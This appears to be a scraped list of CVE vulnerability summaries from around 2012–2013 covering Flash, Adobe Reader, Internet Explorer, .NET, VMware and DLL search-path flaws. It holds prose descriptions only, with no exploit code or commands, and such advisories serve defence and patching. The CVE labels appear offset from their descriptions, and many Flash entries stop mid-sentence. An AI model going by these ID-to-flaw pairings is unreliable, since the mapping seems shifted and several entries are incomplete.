Microsoft XML Core Services (aka MSXML) 3.0, 5.0, and 6.0 does not properly parse XML content, which allows remote attackers to execute arbitrary code via a crafted web page, aka "MSXML Integer Truncation Vulnerability." [CVE-2013-0004] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly validate the permissions of objects in memory, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "Double Construction Vulnerability." [CVE-2013-0003] Buffer overflow in a System.DirectoryServices.Protocols (S.DS.P) namespace method in Microsoft .NET Framework 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a missing array-size check during a memory copy operation, aka "S.DS.P Buffer Overflow Vulnerability." [CVE-2012-6533] Buffer overflow in pgpwded.sys in Symantec PGP Desktop 10.x and Encryption Desktop 10.3.0 before MP1 on Windows XP and Server 2003 allows local users to gain privileges via a crafted application. [CVE-2012-6502] Microsoft Internet Explorer before 10 allows remote attackers to obtain sensitive information about the existence of files, and read certain data from files, via a UNC share pathname in the SRC attribute of a SCRIPT element, as demonstrated by reading a name-value pair from a local file via a \\127.0.0.1\C$\ sequence. [CVE-2012-5678] Adobe Flash Player before 10.3.183.48 and 11.x before 11.5.502.135 on Windows, before 10.3.183.48 and 11.x before 11.5.502.136 on Mac OS X, before 10.3.183.48 and 11.x before 11.2.202.258 on Linux, before 11.1.111.29 on Android 2.x and 3.x, and before 11.1.115.34 on Android 4.x [CVE-2012-5677] Integer overflow in Adobe Flash Player before 10.3.183.48 and 11.x before 11.5.502.135 on Windows, before 10.3.183.48 and 11.x before 11.5.502.136 on Mac OS X, before 10.3.183.48 and 11.x before 11.2.202.258 on Linux, before 11.1.111.29 on Android 2.x and 3.x, and before 11.1.115.34 on Android 4.x [CVE-2012-5676] Buffer overflow in Adobe Flash Player before 10.3.183.48 and 11.x before 11.5.502.135 on Windows, before 10.3.183.48 and 11.x before 11.5.502.136 on Mac OS X, before 10.3.183.48 and 11.x before 11.2.202.258 on Linux, before 11.1.111.29 on Android 2.x and 3.x, and before 11.1.115.34 on Android 4.x [CVE-2012-5673] Unspecified vulnerability in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5672] Microsoft Excel Viewer (aka Xlview.exe) and Excel in Microsoft Office 2007 (aka Office 12) allow remote attackers to cause a denial of service (read access violation and application crash) via a crafted spreadsheet file, as demonstrated by a .xls file with battery voltage data. [CVE-2012-5459] Untrusted search path vulnerability in VMware Workstation 8.x before 8.0.5 and VMware Player 4.x before 4.0.5 on Windows allows host OS users to gain host OS privileges via a Trojan horse DLL in a "system folder." [CVE-2012-5458] VMware Workstation 8.x before 8.0.5 and VMware Player 4.x before 4.0.5 on Windows use weak permissions for unspecified process threads, which allows host OS users to gain host OS privileges via a crafted application. [CVE-2012-5429] The VPN driver in Cisco VPN Client on Windows does not properly interact with the kernel, which allows local users to cause a denial of service (kernel fault and system crash) via a crafted application, aka Bug ID CSCuc81669. [CVE-2012-5383] DISPUTED Untrusted search path vulnerability in the installation functionality in Oracle MySQL 5.5.28, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the "C:\MySQL\MySQL Server 5.5\bin" directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the MySQL installation. [CVE-2012-5382] DISPUTED Untrusted search path vulnerability in the installation functionality in Zend Server 5.6.0 SP4, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the C:\Zend\ZendServer\share\ZendFramework\bin directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the choice of C:\ (and the resulting unsafe PATH) is established by an administrative action that is not a default part of the Zend Server installation. [CVE-2012-5381] DISPUTED Untrusted search path vulnerability in the installation functionality in PHP 5.3.17, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the C:\PHP directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the PHP installation. [CVE-2012-5380] DISPUTED Untrusted search path vulnerability in the installation functionality in Ruby 1.9.3-p194, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the C:\Ruby193\bin directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the Ruby installation. [CVE-2012-5379] DISPUTED Untrusted search path vulnerability in the installation functionality in ActivePython 3.2.2.3, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the C:\Python27 or C:\Python27\Scripts directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the ActivePython installation. [CVE-2012-5378] Untrusted search path vulnerability in the installation functionality in ActiveTcl 8.5.12, when installed in the top-level C:\ directory, allows local users to gain privileges via a Trojan horse DLL in the C:\TD\bin directory, which is added to the PATH system environment variable, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. [CVE-2012-5377] Untrusted search path vulnerability in the installation functionality in ActivePerl 5.16.1.1601, when installed in the top-level C:\ directory, allows local users to gain privileges via a Trojan horse DLL in the C:\Perl\Site\bin directory, which is added to the PATH system environment variable, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. [CVE-2012-5287] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5286] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5285] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5280] Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5279] Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5278] Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5277] Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5276] Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5275] Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5274] Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5272] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5271] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5270] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5269] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5268] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5267] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5266] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5265] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5264] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5263] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5262] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5261] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5260] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5259] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5258] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5257] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5256] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5255] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5254] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5253] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5252] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5251] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5250] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5249] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5248] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5154] Integer overflow in Google Chrome before 24.0.1312.52 on Windows allows attackers to cause a denial of service or possibly have unspecified other impact via vectors related to allocation of shared memory. [CVE-2012-4969] Use-after-free vulnerability in the CMshtmlEd::Exec function in mshtml.dll in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site, as exploited in the wild in September 2012. [CVE-2012-4792] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object, and exploited in the wild in December 2012. [CVE-2012-4791] Microsoft Exchange Server 2007 SP3 and 2010 SP1 and SP2 allows remote authenticated users to cause a denial of service (Information Store service hang) by subscribing to a crafted RSS feed, aka "RSS Feed May Cause Exchange DoS Vulnerability." [CVE-2012-4787] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly initialized or (2) is deleted, aka "Improper Ref Counting Use After Free Vulnerability." [CVE-2012-4782] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "CMarkup Use After Free Vulnerability." [CVE-2012-4781] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "InjectHTMLStream Use After Free Vulnerability." [CVE-2012-4777] The code-optimization feature in the reflection implementation in Microsoft .NET Framework 4 and 4.5 does not properly enforce object permissions, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka "WPF Reflection Optimization Vulnerability." [CVE-2012-4776] The Web Proxy Auto-Discovery (WPAD) functionality in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not validate configuration data that is returned during acquisition of proxy settings, which allows remote attackers to execute arbitrary JavaScript code by providing crafted data during execution of (1) an XAML browser application (aka XBAP) or (2) a .NET Framework application, aka "Web Proxy Auto-Discovery Vulnerability." [CVE-2012-4775] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site, aka "CTreeNode Use After Free Vulnerability." [CVE-2012-4363] Multiple unspecified vulnerabilities in Adobe Reader through 10.1.4 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PDF document, related to "sixteen more crashes affecting Windows, OS X, or both systems." [CVE-2012-4350] Multiple unquoted Windows search path vulnerabilities in the (1) Manager and (2) Agent components in Symantec Enterprise Security Manager (ESM) before 11.0 allow local users to gain privileges via unspecified vectors. [CVE-2012-4349] Unquoted Windows search path vulnerability in Symantec Network Access Control (SNAC) 12.1 before RU2 allows local users to gain privileges via unspecified vectors. [CVE-2012-4337] Foxit Reader before 5.3 on Windows XP and Windows 7 allows remote attackers to execute arbitrary code via a PDF document with a crafted attachment that triggers calculation of a negative number during processing of cross references. [CVE-2012-4206] Untrusted search path vulnerability in the installer in Mozilla Firefox before 17.0 and Firefox ESR 10.x before 10.0.11 on Windows allows local users to gain privileges via a Trojan horse DLL in the default downloads directory. [CVE-2012-4171] Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4168] Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4167] Integer overflow in Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4165] Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4164] Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4163] Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4160] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, and CVE-2012-4159. [CVE-2012-4159] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, and CVE-2012-4160. [CVE-2012-4158] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4157] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4156] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4155] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4154] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4153] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4152] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4151] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4150] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4149] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4148] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4147] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4145] Unspecified vulnerability in Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x before 12.01 on Mac OS X, has unknown impact and attack vectors, related to a "low severity issue." [CVE-2012-4144] Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x before 12.01 on Mac OS X, does not properly escape characters in DOM elements, which makes it easier for remote attackers to bypass cross-site scripting (XSS) protection mechanisms via a crafted HTML document. [CVE-2012-4143] Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x before 12.01 on Mac OS X, allows user-assisted remote attackers to trick users into downloading and executing arbitrary files via a small window for the download dialog, a different vulnerability than CVE-2012-1924. [CVE-2012-4142] Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x before 12.01 on Mac OS X, ignores some characters in HTML documents in unspecified circumstances, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via a crafted document. [CVE-2012-3974] Untrusted search path vulnerability in the installer in Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, Thunderbird before 15.0, and Thunderbird ESR 10.x before 10.0.7 on Windows allows local users to gain privileges via a Trojan horse executable file in a root directory. [CVE-2012-3569] Format string vulnerability in VMware OVF Tool 2.1 on Windows, as used in VMware Workstation 8.x before 8.0.5, VMware Player 4.x before 4.0.5, and other products, allows user-assisted remote attackers to execute arbitrary code via a crafted OVF file. [CVE-2012-3456] Heap-based buffer overflow in the read function in filters/words/msword-odf/wv2/src/styles.cpp in the Microsoft import filter in Calligra 2.4.3 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted ODF style in an ODF document. NOTE: this is the same vulnerability as CVE-2012-3455, but it was SPLIT by the CNA even though Calligra and KOffice share the same codebase. [CVE-2012-3455] Heap-based buffer overflow in the read function in filters/words/msword-odf/wv2/src/styles.cpp in the Microsoft import filter in KOffice 2.3.3 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted ODF style in an ODF document. NOTE: this is the same vulnerability as CVE-2012-3456, but it was SPLIT by the CNA even though 